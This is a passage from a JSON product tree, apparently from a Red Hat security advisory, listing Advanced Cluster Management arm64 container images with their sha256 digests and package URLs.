"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3Adfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3Afeffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3Adcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3A60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Afd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3Af72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3Ab4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3Ae0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3Aef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3Af7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Af1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3Aadd985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Abf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3Ae4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3Afe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3Ae9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
